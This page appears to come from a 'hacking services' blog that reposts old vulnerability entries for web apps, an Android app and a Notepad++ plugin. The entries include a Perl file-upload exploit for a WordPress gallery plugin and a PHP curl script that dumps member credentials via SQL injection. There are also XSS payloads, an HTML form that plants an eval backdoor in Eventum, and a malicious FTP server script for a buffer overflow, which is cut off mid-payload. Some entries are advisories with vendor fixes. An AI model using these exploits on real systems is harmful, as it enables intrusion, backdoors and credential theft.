Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863147328

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/65059/info

Imageview is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Imageview 6.x are vulnerable; other versions may also be affected. 

http://www.example.com/photos/upload.php
http://www.example.com/Galerie/upload.php
HireHackking 
source: https://www.securityfocus.com/bid/65121/info

XOS Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

XOS Shop 1.0 rc7o is vulnerable; other versions may also be affected. 

http://www.example.com/Xoshop/shop/redirect.php?action=url&goto=[SQLI]
HireHackking 
source: https://www.securityfocus.com/bid/65060/info

The Global Flash Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

#! /usr/bin/perl
  use LWP;
  use HTTP::Request::Common;
  
  my ($url, $file) = @ARGV;
  
  my $ua = LWP::UserAgent->new();
  my $req = POST $url,
    Content_Type => 'form-data',
    Content =>    [
  name => $name,
  galleryselect => 1, # Gallery ID (popup.php)
  Filedata => [ "$file", "file.php.gif",  Content_Type =>
  'image/gif' ]
            ];
  my $res = $ua->request( $req );
  if( $res->is_success ) {
    print $res->content;
  } else {
    print $res->status_line, "\n";
  }

--------------------
Example URI:
--------------------
http://www.example.com/wp-content/plugins/global-flash-galleries/swfupload.php
HireHackking 
source: https://www.securityfocus.com/bid/65123/info

GoToMeeting for Android is prone to multiple local information-disclosure vulnerabilities.

Local attackers can exploit these issues to obtain sensitive information, which may aid in further attacks.

GoToMeeting 5.0.799.1238 is vulnerable; other versions may also be affected. 

<! ----- SNIPPET ------- !>

D/G2M     (32190): HttpRequest to: 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]
E/qcom_sensors_hal(  787): hal_process_report_ind: Bad item quality: 11 
D/dalvikvm(32190): GC_CONCURRENT freed 1322K, 43% free 20491K/35456K, paused 6ms+1ms, total 33ms
D/G2M     (32190): HttpRequest response from: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]
 -> 200
D/G2M     (32190): HttpRequest response body: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]
 -> {"Status":"Redirect","RedirectHost":"www1.gotomeeting.com","MeetingId":"[MEETING_ID_REDACTED]"}
D/G2M     (32190): Got 302 from legacy JSON API: www1.gotomeeting.com
D/G2M     (32190): HttpRequest to: 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED]
D/G2M     (32190): HttpRequest response from: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED] -> 200
D/G2M     (32190): HttpRequest response body: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED] -> 
{"Status":"MeetingNotStarted","MeetingId":"[MEETING_ID_REDACTED]","IsRecurring":false,"Endpoints":["Native"],"OrganizerName":"[REDACTED]","Subject":"[REDACTED]","MaxAttendees":100,"IsWebinar":false,"AudioParameters":{"CommParams":{"disableUdp":false},"ConferenceParams":{"supportedModes":"VoIP,PSTN,Private","initialMode":"Hybrid","SpeakerInfo":{"PhoneInfo":[{"description":"Default","number":"[REDACTED],"authToken":"AAFe4rYexu4Dm7qrL45/Egx+AAAAAFLdeSkAAAAAUt7KqUbWYmXH3OcczkhGaWRf0wM2OKWa","accessCode":"REDACTED"},"userId":"userId","authToken":"EAEBAQEBAQEBAQEBAQEBAQE=","privateMessage":"","audioKey":-1,"BridgeMutingControl":true,"VCBParams":{"Codec":[{"payloadType":103,"frameLength":30,"name":"ISAC","bitrate":32000,"channels":1,"samplingRate":16000},{"payloadType":0,"frameLength":20,"name":"PCMU","bitrate":64000,"ch
 
annels":1,"samplingRate":8000}],"VCB":{"port":5060,"ipAddr":"10.23.70.151"},"Options":{"asUpdates":true,"rtUpdates":true,"dtx":false}}}},"EndTime":1390239900000,"StartTime":1390237200000,"IsImpromptu":false}
D/G2M     (32190): Got response from legacy JSON API: 200
D/G2M     (32190): JoinService: Attempting to join Meeting
D/G2M     (32190): MeetingService: Starting Meeting join on legacy...
D/G2M     (32190): HttpRequest to: 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
D/G2M     (32190): ServiceResolver: COLService: BaseURL [https://www.example.com], isLegacy [true}, isWebinar 
[false]
D/G2M     (32190): HttpRequest response from: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
 -> 302
D/G2M     (32190): HttpRequest response body: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
 -> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<! ----- SNIPPET ------- !>
HireHackking

ZenPhoto - SQL Injection 

source: https://www.securityfocus.com/bid/65126/info

ZenPhoto is prone to an SQL-injection vulnerability and multiple path-disclosure vulnerabilities.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The attacker may gain access to potentially sensitive information that can aid in other attacks.

ZenPhoto 1.4.4 is vulnerable; other versions may also be affected. 

http://www.example.com/zenphoto/index.php?p=search&date=[SQL Injection]
HireHackking 
source: https://www.securityfocus.com/bid/65130/info

The WP e-Commerce plugin for WordPress is prone to multiple security vulnerabilities, including:

1. Multiple remote code-execution vulnerabilities.
2. A local file-include vulnerability
3. An arbitrary file-upload vulnerability

An attacker can exploit these issues to execute arbitrary code, include arbitrary local files, upload arbitrary files to the affected computer that may result in arbitrary code execution within the context of the vulnerable application.

WP e-Commerce 3.8.9.5 is vulnerable; other versions may also be affected. 

Local file-include
http://www.example.com/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=[LFI]

Remote code-execution
http://www.example.com/wp-e-commerce/wpsc-admin/ajax.php?wpsc_action=[CMD]
http://www.example.com/wp-e-commerce/wpsc-admin/display-sales-logs.php?c=[CMD]
HireHackking 
source: https://www.securityfocus.com/bid/65137/info

Maian Uploader is prone to multiple security vulnerabilities, including:

1. An SQL-injection vulnerability
2. Multiple cross-site scripting vulnerabilities

Attackers can exploit these issues to access or modify data, exploit latent vulnerabilities in the underlying database, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Maian Uploader 4.0 is vulnerable; other versions may also be affected. 

+] Exploit (1) ' SQL Injection ' =>
#
# <?php
#
# /*
#
# - move.php (lines: 90 > 92 )
# $q_acc = mysql_query("SELECT id,username FROM ".$database['prefix']."members 
# WHERE id != '".$_POST['id']."' 
# ORDER BY accname") or die(mysql_error());
#
# */
#
# $sqli = "SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,ftp_user,0x3a,ftp_pass SEPARATOR 0x2c20) FROM mu_members";
#
# $ch = curl_init();
# curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
# curl_setopt($ch, CURLOPT_URL, "http://[target]/[path]/admin/data_files/move.php");
# curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
# curl_setopt($ch, CURLOPT_POST, 1);
# curl_setopt($ch, CURLOPT_POSTFIELDS, "id=$sqli");
# $exploit = curl_exec ($ch);
# curl_close($ch);
# unset($ch);
# echo $exploit;
# ?>
# 
####
#
# [+] Exploit (2) ' XSRF/XSS ' =>
#
# - load_flv.js.php ( line : 25 ) 
# document.write('<object type="application/x-shockwave-flash" .....
# width="<?php echo $_GET['width']; ?>" 
# height="<?php echo $_GET['height']; ?>
#
# XSS : "><h1>XsS by KedAns-Dz</h1>
# XSS : "><script>Alert('XsS by KedAns-Dz');</script>
#
# http://127.0.0.1/uploader/admin/js/load_flv.js.php?width=[ XSS ]
# http://127.0.0.1/uploader/js/load_flv.js.php?width=[ XSS ]
#
# [&] Exploit (3) ' Full Path Disclosure ' => 
#
# don't put ( &height= ) after width Xss and you get error 
# Notice about ( Undefined index: height ) with the Full Path Dir.
#
######################################################################
HireHackking 
source: https://www.securityfocus.com/bid/65186/info

Eventum is prone to an insecure file-permission vulnerability.

An attacker can exploit this issue to reinstall vulnerable application. This may aid in further attacks.

Eventum 2.3.4 is vulnerable; other versions may also be affected. 

Following example URI is available.

http://www.example.com/setup/index.php
HireHackking 
Advisory ID: HTB23198
Product: Eventum
Vendor: Eventum Development Team
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Advisory Publication:  January 22, 2014  [without technical details]
Vendor Notification: January 22, 2014 
Vendor Patch: January 24, 2014 
Public Disclosure: January 27, 2014 
Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94]
CVE References: CVE-2014-1631, CVE-2014-1632
Risk Level: Critical 
CVSSv2 Base Scores: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P), 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Eventum, which can be exploited to reinstall and compromise vulnerable application.


1) Incorrect Default Permissions in Eventum: CVE-2014-1631

The vulnerability exists due to incorrect default permission set for installation scripts. Access to installation script located at "/setup/index.php" is not restricted by default and the script is not deleted during the installation process. A remote attacker can access the script and reinstall vulnerable application. 

The installation script can be access by a remote unauthenticated user via the following URL:

http://[host]/setup/index.php


2) Code Injection in Eventum: CVE-2014-1632

The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname" in "/config/config.php" script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with privileges of the webserver. Successful exploitation requires access to application’s database, which can be achieved by providing address of attacker-controlled MySQL server. 

The following exploitation example injects a backdoor into "/config/config.php" file:


<form action="http://[host]/setup/index.php" method="post" name="main">
<input type="hidden" name="cat" value="install">
<input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
<input type="hidden" name="relative" value="/">
<input type="hidden" name="db_hostname" value="db_hostname">
<input type="hidden" name="db_name" value="db_name">
<input type="hidden" name="db_table_prefix" value="db_table_prefix">
<input type="hidden" name="drop_tables" value="yes">
<input type="hidden" name="db_username" value="db_username">
<input type="hidden" name="setup[smtp][from]" value="email@email.com">
<input type="hidden" name="setup[smtp][host]" value="localhost">
<input type="hidden" name="setup[smtp][port]" value="25">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>


After successful reinstallation an attacker can execute arbitrary PHP code on the system. The following example executes the "phpinfo()" PHP function on the vulnerable system:

http://[host]/index.php?cmd=phpinfo%28%29;

-----------------------------------------------------------------------------------------------

Solution:

Update to Eventum 2.3.5

More Information:
https://bugs.launchpad.net/eventum/+bug/1271499

Vendor disclosed vulnerabilities and authorized us to release advisory on public before our usual delay (3 weeks).

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23198 - https://www.htbridge.com/advisory/HTB23198 - Multiple Vulnerabilities in Eventum.
[2] Eventum - https://launchpad.net/eventum - Eventum is a user-friendly and flexible issue tracking system that can be used by a support department to track incoming technical support requests, or by a software development team to quickly organize tasks and bugs.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
HireHackking 
# Title : Notepad ++ NPPFtp Plugin Buffer Overflow
# Date : 19/12/2015
# Author : R-73eN
# Tested on : NPPFtp 0.26.3 (Latest Version)
# Software : http://sourceforge.net/projects/nppftp/
# Vendor : https://notepad-plus-plus.org/
#  ___        __        ____                 _    _  
# |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
# |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|
#
# A buffer overflow exists in the NPPftp plugin. When the plugin is connected to a malicious server
# which server a crafted LIST response causes the application to crash.
#
# How to reproduce
#
# 1. Start this python server
# 2. Open Notepad ++ , go to plugins , NPPFtp, Show windows
# 3. Click on the gear button to create a new connection.
# 4. Create the connection to connect to the server.
# 5. Connect and the application will crash.

import os,socket,threading,time
allow_delete = False
local_ip = "192.168.1.121"#socket.gethostbyname(socket.gethostname())
local_port = 21
currdir=os.path.abspath('.')

buff = "rwxrwxrwx   1 1 00" + "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2Gm3Gm4Gm5Gm6Gm7Gm8Gm9Gn0Gn1Gn2Gn3Gn4Gn5Gn6Gn7Gn8Gn9Go0Go1Go2Go3Go4Go5Go6Go7Go8Go9Gp0Gp1Gp2Gp3Gp4Gp5Gp6Gp7Gp8Gp9Gq0Gq1Gq2Gq3Gq4Gq5Gq6Gq7Gq8Gq9Gr0Gr1Gr2Gr3Gr4Gr5Gr6Gr7Gr8Gr9Gs0Gs1Gs2Gs3Gs4Gs5Gs6Gs7Gs8Gs9Gt0Gt1Gt2Gt3Gt4Gt5Gt6Gt7Gt8Gt9Gu0Gu1Gu2Gu3Gu4Gu5Gu6Gu7Gu8Gu9Gv0Gv1Gv2Gv3Gv4Gv5Gv6Gv7Gv8Gv9Gw0Gw1Gw2Gw3Gw4Gw5Gw6Gw7Gw8Gw9Gx0Gx1Gx2Gx3Gx4Gx5Gx6Gx7Gx8Gx9Gy0Gy1Gy2Gy3Gy4Gy5Gy6Gy7Gy8Gy9Gz0Gz1Gz2Gz3Gz4Gz5Gz6Gz7Gz8Gz9Ha0Ha1Ha2Ha3Ha4Ha5Ha6Ha7Ha8Ha9Hb0Hb1Hb2Hb3Hb4Hb5Hb6Hb7Hb8Hb9Hc0Hc1Hc2Hc3Hc4Hc5Hc6Hc7Hc8Hc9Hd0Hd1Hd2Hd3Hd4Hd5Hd6Hd7Hd8Hd9He0He1He2He3He4He5He6He7He8He9Hf0Hf1Hf2Hf3Hf4Hf5Hf6Hf7Hf8Hf9Hg0Hg1Hg2Hg3Hg4Hg5Hg6Hg7Hg8Hg9Hh0Hh1Hh2Hh3Hh4Hh5Hh6Hh7Hh8Hh9Hi0Hi1Hi2Hi3Hi4Hi5Hi6Hi7Hi8Hi9Hj0Hj1Hj2Hj3Hj4Hj5Hj6Hj7Hj8Hj9Hk0Hk1Hk2Hk3Hk4Hk5Hk6Hk7Hk8Hk9Hl0Hl1Hl2Hl3Hl4Hl5Hl6Hl7Hl8Hl9Hm0Hm1Hm2Hm3H